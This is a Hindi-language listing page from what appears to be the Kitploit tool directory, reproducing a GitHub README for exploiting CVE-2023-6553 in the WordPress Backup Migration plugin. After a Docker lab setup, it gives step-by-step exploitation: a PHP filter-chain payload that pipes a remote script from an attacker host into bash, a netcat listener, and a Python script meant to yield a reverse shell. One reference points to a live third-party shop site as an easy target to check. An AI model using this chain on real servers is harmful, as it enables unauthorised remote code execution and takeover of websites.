Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-6553 — CVE-2023-6553 के लिए Wordpress में बैकअप प्लगइन पर एक्सप्लॉइट विकास | Kitploit
उपकरण/GitHubGitHub/harshit-mashru/cve-2023-6553
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubharshit-mashru/cve-2023-6553

CVE-2023-6553

CVE-2023-6553 के लिए Wordpress में बैकअप प्लगइन पर एक्सप्लॉइट विकास

रिपॉजिटरी देखें
41 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-6553

Wordpress में Backup Plugin के लिए CVE-2023-6553 का Exploit Development

यह एक गंभीर CVE है जिसका CVSS स्कोर 9.8 है।

यह भेद्यता हमलावर को प्लगइन के असुरक्षित संस्करण को चला रहे सर्वर पर कमांड भेजने की अनुमति देती है।

असुरक्षित संस्करण Backup <= 1.3.7

सेटअप

  1. रिपॉजिटरी को git clone करें

  2. डॉकर कंटेनर सेट करने के लिए नीचे दिया गया कमांड चलाएँ

root@kitploit:~
docker-compose up -d

आपको 2 डॉकर कंटेनर दिखने चाहिए

  • Wordpress
  • SQL
  1. अब आप डॉकर कंटेनर के आईपी पर वर्डप्रेस साइट पर जा सकते हैं, और इसे निम्न पर भी एक्सेस किया जा सकता है
root@kitploit:~
http://localhost:8000/
  1. असुरक्षित बैकअप प्लगइन इंस्टॉल करने के लिए निम्न कमांड चलाएँ
root@kitploit:~
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
  1. अब चरण 3 में दिए लिंक का उपयोग करके वर्डप्रेस वेबसाइट में लॉगिन करें और ऊपर दिए कमांड से इसे डाउनलोड करने के बाद बैकअप प्लगइन इंस्टॉल करें

एक्सप्लॉइटेशन

  1. एक्सप्लॉइट चलाने पर कॉलबैक पाने के लिए पोर्ट 9000 पर एक लिसनर शुरू करें।
root@kitploit:~
python3 -m http.server
  1. निम्न कमांड का उपयोग करके go स्क्रिप्ट चलाएँ
root@kitploit:~
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
  1. आपको निम्न त्रुटि मिलेगी
root@kitploit:~
HTTP Response Body:  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>

ऐसा इसलिए है क्योंकि फ़िल्टर रूपांतरणों के बाद हेडर का आकार सर्वर की अनुमत सीमा से अधिक हो जाता है।

  1. इसलिए अब हम अपने कमांड को टुकड़ों में तोड़ते हैं, उसे रिमोट सर्वर पर एक फ़ाइल में लिखते हैं और फिर उसे निष्पादित करते हैं, लेकिन उससे पहले हमें रिवर्स शेल पाने के लिए सुनना शुरू करना होगा
root@kitploit:~
nc -nlvp 8080

और अब असुरक्षित प्लगइन का शोषण करने के लिए कमांड चलाएँ

root@kitploit:~
python3 final_exploit.py
  1. इस बिंदु पर आपके पास एक रिवर्स शेल होना चाहिए

संदर्भ

  • https://patchstack.com/articles/test-wordpress-plugin-security/
  • https://patchstack.com/whitepaper/the-state-of-wordpress-security-in-2021/
  • https://wordpress.org/plugins/backup-backup/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup-backup/backup-migration-137-unauthenticated-remote-code-execution
  • https://plugins.trac.wordpress.org/browser/backup-backup/​
  • https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py ​
  • https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it ​
  • How easy it is to check if vulnerable version of wordpress is present: https://www.thetraveloutlier.com/shop/​
टूल डाउनलोड करें